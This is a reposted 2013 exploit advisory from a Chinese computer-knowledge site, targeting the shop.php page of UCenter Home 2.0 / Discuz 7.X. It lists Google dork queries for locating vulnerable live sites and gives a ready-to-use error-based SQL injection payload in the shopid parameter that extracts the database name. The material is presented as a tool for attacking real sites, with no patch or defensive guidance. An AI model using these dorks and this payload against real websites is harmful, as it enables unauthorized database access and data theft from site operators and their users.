选择风格

品易HTTP - 代理IP日更400万 - 为企业提供HTTP代理IP定制服务

当前位置：首页 >> 网络通讯 >> 网络安全 >> 内容

Discuz7.X通杀0day(UCenter Home-2.0)

时间：2013/4/19 12:09:00 作者：平凡之路　来源：xuhantao.com 浏览：

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
Vuln file : Shop.php
===================================================================
利用POC

shop.php?ac=view&shopid=4 and (select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

，www.xuhantao.com，涛涛电脑知识网

分享到： QQ空间腾讯微博新浪微博人人网百度贴吧

上一篇：From XSLT code execution to Meterpreter shells

下一篇：第一茶叶网茶叶街子系统存在SQL注入

相关文章

没有相关文章

共有评论 0 条相关评论

发表我的评论

大名：
内容：

本类热门

本类推荐

本类固顶

暂无信息

徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.

部分内容来自网络，如有侵权请联系站长尽快处理站长QQ:965898558(广告及站内业务受理)

网站备案号：蒙ICP备15000590号-1